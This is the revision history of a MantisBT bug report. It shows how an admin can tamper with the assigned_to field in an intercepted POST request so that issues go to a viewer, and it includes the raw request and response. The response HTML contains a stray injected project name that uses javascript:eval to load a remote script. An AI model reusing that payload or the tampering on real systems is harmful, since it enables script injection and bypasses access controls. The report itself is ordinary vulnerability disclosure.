View Revisions: Issue #27268

Summary 0027268: Admin can get issues assigned to users not allowed to handle them
Revision 2020-09-10 06:15 by dregad
Steps To Reproduce
  1. Login as your admin account
  2. Go to manage > manage projects
  3. Open your intercept
  4. Select any member on select input

Request :

POST /mantisbt2/manage_proj_cat_update.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt2/manage_proj_cat_edit_page.php?id=1&project_id=1
Cookie: MANTIS_collapse_settings=|sidebar:0; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_secure_session=0; MANTIS_BUG_LIST_COOKIE=4; PHPSESSID=h4478kp8q2d69eg6e13pjo0hfe; MANTIS_STRING_COOKIE=7a01c128bae97499b78c1a52329936977c062961f7d9b57cd3d18980fdccc896
Upgrade-Insecure-Requests: 1

manage_proj_cat_update_token=<SOME-TOKEN>&project_id=1&category_id=1&name=General&assigned_to=<VULNERABLE>

Response :

HTTP/1.1 200 OK
Date: Thu, 10 Sep 2020 00:38:17 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 10 Sep 2020 00:38:17 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Thu, 10 Sep 2020 00:38:17 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Vary: Accept-Encoding
Content-Length: 10006
Connection: close
Content-Type: text/html; charset=UTF-8

EDIT (dregad): Moved HTML of success page to attachment.

  1. Edit the assigned_to=<VULNERABLE> (I try to set this to viewer and this works)
  2. Refresh the site and viewer now become assigned to the stuffs
Revision 2020-09-09 20:43 by d3vpoo1
Steps To Reproduce
  1. Login as your admin account

  2. Go to manage > manage projects

  3. Open your intercept

  4. Select any member on select input

Request :

POST /mantisbt2/manage_proj_cat_update.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt2/manage_proj_cat_edit_page.php?id=1&amp;project_id=1
Cookie: MANTIS_collapse_settings=|sidebar:0; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_secure_session=0; MANTIS_BUG_LIST_COOKIE=4; PHPSESSID=h4478kp8q2d69eg6e13pjo0hfe; MANTIS_STRING_COOKIE=7a01c128bae97499b78c1a52329936977c062961f7d9b57cd3d18980fdccc896
Upgrade-Insecure-Requests: 1

manage_proj_cat_update_token=<SOME-TOKEN>&project_id=1&category_id=1&name=General&assigned_to=<VULNERABLE>

Response :

HTTP/1.1 200 OK
Date: Thu, 10 Sep 2020 00:38:17 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 10 Sep 2020 00:38:17 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Thu, 10 Sep 2020 00:38:17 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Vary: Accept-Encoding
Content-Length: 10006
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<title>MantisBT</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />
<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/default.css&quot; />
<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/status_config.php?cache_key=f4856b33b84f247924ce5769a9d0b2d2&quot; />
<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/dropzone-5.5.0.min.css&quot; />
<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/bootstrap-3.4.1.min.css&quot; />
<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/font-awesome-4.6.3.min.css&quot; />
<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/fonts.css&quot; />
<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/bootstrap-datetimepicker-4.17.47.min.css&quot; />
<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/ace.min.css&quot; />
<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/ace-mantis.css&quot; />
<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/ace-skins.min.css&quot; />

&lt;link rel=&quot;shortcut icon&quot; href=&quot;/mantisbt2/images/favicon.ico&quot; type=&quot;image/x-icon&quot; />
&lt;link rel=&quot;search&quot; type=&quot;application/opensearchdescription+xml&quot; title=&quot;MantisBT: full-text search&quot; href=&quot;http://localhost/mantisbt2/browser_search_plugin.php?type=text&quot;/>
&lt;link rel=&quot;search&quot; type=&quot;application/opensearchdescription+xml&quot; title=&quot;MantisBT: search by Issue Id&quot; href=&quot;http://localhost/mantisbt2/browser_search_plugin.php?type=id&quot;/>
&lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/javascript_config.php?cache_key=f4856b33b84f247924ce5769a9d0b2d2&quot;>&lt;/script>
&lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/javascript_translations.php?cache_key=3be95d1715b5c55a9480208daf800add&quot;>&lt;/script>
&lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/jquery-2.2.4.min.js&quot;>&lt;/script>
&lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/dropzone-5.5.0.min.js&quot;>&lt;/script>
&lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/common.js&quot;>&lt;/script>
&lt;meta http-equiv=&quot;Refresh&quot; content=&quot;1; URL=http://localhost/mantisbt2/manage_proj_page.php&quot; />

</head>
<body class="skin-3">
<style>

  • { font-family: "Open Sans"; }
    h1, h2, h3, h4, h5 { font-family: "Open Sans"; }
    </style>
    <div id="navbar" class="navbar navbar-default navbar-collapse navbar-fixed-top noprint"><div id="navbar-container" class="navbar-container"><button id="menu-toggler" type="button" class="navbar-toggle menu-toggler pull-left hidden-lg hidden-md" data-target="#sidebar"><span class="sr-only">Toggle sidebar</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><div class="navbar-header"><a href="/mantisbt2/my_view_page.php" class="navbar-brand"><span class="smaller-75"> MantisBT </span></a><button type="button" class="navbar-toggle navbar-toggle collapsed pull-right hidden-sm hidden-md hidden-lg" data-toggle="collapse" data-target=".navbar-buttons,.navbar-menu"><span class="sr-only">Toggle user menu</span><i class="ace-icon fa fa-user fa-2x white"></i> </button></div><div class="navbar-buttons navbar-header navbar-collapse collapse"><ul class="nav ace-nav"><li class="hidden-sm hidden-xs"><div class="btn-group btn-corner padding-right-8 padding-left-8"><a class="btn btn-primary btn-sm" href="bug_report_page.php"><i class="fa fa-edit"></i> Report Issue</a><a class="btn btn-primary btn-sm" href="manage_user_create_page.php"><i class="fa fa-user-plus"></i> Invite Users</a></div></li><li class="grey" id="dropdown_projects_menu">
    <a data-toggle="dropdown" href="#" class="dropdown-toggle">
     "> javascript:eval('var a=document.createElement(\'script\');a.src=\'0000160">https://mybl&0000160;
    <i class="ace-icon fa fa-angle-down bigger-110"></i>
    </a>
    <ul id="projects-list" class=" dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close">
    <li><div class="projects-searchbox"><input class="search form-control input-md" placeholder="Search" /></div></li><li class="divider"></li>
    <li><div class="scrollable-menu"><ul class="list dropdown-yellow no-margin"><li>/mantisbt2/set_project.php?project_id=0</li>
    <li class="divider"></li>
    <li class="active">/mantisbt2/set_project.php?project_id=1</li>
    </ul></div></li></ul>
    </li>
    <li class="grey"><a data-toggle="dropdown" href="#" class="dropdown-toggle"><i class="ace-icon fa fa-user fa-2x white"></i> <span class="user-info">administrator</span><i class="ace-icon fa fa-angle-down"></i></a><ul class="user-menu dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close"><li><a href="/mantisbt2/account_page.php"><i class="ace-icon fa fa-user"> </i> My Account</a></li><li><a href="http://localhost/mantisbt2/issues_rss.php?username=administrator&amp;key=nNUB0bUOFU1-De7V6n8RKAdmhJ6pi6Aa90nbcI9AxxsZbE1s_lH6wQuBjczaLZGNrGwqwTcaFunQLMtD04uK&amp;project_id=1&quot;>&lt;i class="ace-icon fa fa-rss-square orange"> </i> RSS</a></li><li class="divider"></li><li><a href="/mantisbt2/logout_page.php"><i class="ace-icon fa fa-sign-out"> </i> Logout</a></li></ul></li></ul></div></div></div><div class="main-container" id="main-container">
    <div id="sidebar" class="sidebar sidebar-fixed responsive compact "><ul class="nav nav-list"><li>
    <a href="/mantisbt2/my_view_page.php">
    <i class="menu-icon fa fa-dashboard"></i>
    <span class="menu-text"> My View </span>
    </a>
    <b class="arrow"></b>
    </li>
    <li>
    <a href="/mantisbt2/view_all_bug_page.php">
    <i class="menu-icon fa fa-list-alt"></i>
    <span class="menu-text"> View Issues </span>
    </a>
    <b class="arrow"></b>
    </li>
    <li>
    <a href="/mantisbt2/bug_report_page.php">
    <i class="menu-icon fa fa-edit"></i>
    <span class="menu-text"> Report Issue </span>
    </a>
    <b class="arrow"></b>
    </li>
    <li>
    <a href="/mantisbt2/changelog_page.php">
    <i class="menu-icon fa fa-retweet"></i>
    <span class="menu-text"> Change Log </span>
    </a>
    <b class="arrow"></b>
    </li>
    <li>
    <a href="/mantisbt2/roadmap_page.php">
    <i class="menu-icon fa fa-road"></i>
    <span class="menu-text"> Roadmap </span>
    </a>
    <b class="arrow"></b>
    </li>
    <li>
    <a href="/mantisbt2/summary_page.php">
    <i class="menu-icon fa fa-bar-chart-o"></i>
    <span class="menu-text"> Summary </span>
    </a>
    <b class="arrow"></b>
    </li>
    <li class="active">
    <a href="/mantisbt2/manage_overview_page.php">
    <i class="menu-icon fa fa-gears"></i>
    <span class="menu-text"> Manage </span>
    </a>
    <b class="arrow"></b>
    </li>
    </ul><div id="sidebar-btn" class="sidebar-toggle sidebar-collapse"><i data-icon2="ace-icon fa fa-angle-double-right" data-icon1="ace-icon fa fa-angle-double-left"
    class="ace-icon fa fa-angle-double-left"></i></div></div><div class="main-content">
    <div id="breadcrumbs" class="breadcrumbs noprint">
    <ul class="breadcrumb">
    <li><i class="fa fa-user home-icon active"></i> /mantisbt2/account_page.php
    <span class="label hidden-xs label-default arrowed">administrator</span></li>
    </ul>
    <div class="nav-recent hidden-xs">Recently Visited: /mantisbt2/view.php?id=4, /mantisbt2/view.php?id=2, /mantisbt2/view.php?id=3, 0000001</div><div id="nav-search" class="nav-search"><form class="form-search" method="post" action="/mantisbt2/jump_to_bug.php"><span class="input-icon"><input type="text" name="bug_id" autocomplete="off" class="nav-search-input" placeholder="Issue #"><i class="ace-icon fa fa-search nav-search-icon"></i></span></form></div>
    </div>
    <div class="page-content">
    <div class="row">
    <div class="container-fluid"><div class="col-md-12 col-xs-12"><div class="space-0"></div><div class="alert alert-success center"><p class="bold bigger-110">Operation successful.</p><br /><div class="btn-group">manage_proj_page.php</div></div></div></div>
    </div>
    </div>
    </div>
    <div class="clearfix"></div>
    <div class="space-20"></div>
    <div class="footer noprint">
    <div class="footer-inner">
    <div class="footer-content">
    <div class="col-md-6 col-xs-12 no-padding">
    <address>
    <strong>Powered by https://www.mantisbt.org</strong> <br>
    <small>Copyright © 2000 - 2020 MantisBT Team</small><br><small>Contact webmaster@example.com for assistance</small><br>
    </address>
    </div>
    <div class="col-md-6 col-xs-12">
    <div class="pull-right" id="powered-by-mantisbt-logo">
    <a href="https://www.mantisbt.org&quot; title="Mantis Bug Tracker: a free and open source web based bug tracking system."><img src="/mantisbt2/images/mantis_logo.png" width="102" height="35" alt="Powered by Mantis Bug Tracker: a free and open source web based bug tracking system." /></a>
    </div>
    </div>
    </div>
    </div>
    </div>
    <a class="btn-scroll-up btn btn-sm btn-inverse display" id="btn-scroll-up" href="#">
    <i class="ace-icon fa fa-angle-double-up icon-only bigger-110"></i>
    </a>
    </div>
    <script type="text/javascript" src="/mantisbt2/js/bootstrap-3.4.1.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/moment-with-locales-2.24.0.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/bootstrap-datetimepicker-4.17.47.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/typeahead.jquery-1.3.0.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/list-1.5.0.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/ace.min.js"></script>
    </body>
    </html>
  1. Edit the assigned_to=<VULNERABLE> (I try to set this to viewer and this works)

  2. Refresh the site and viewer now become assigned to the stuffs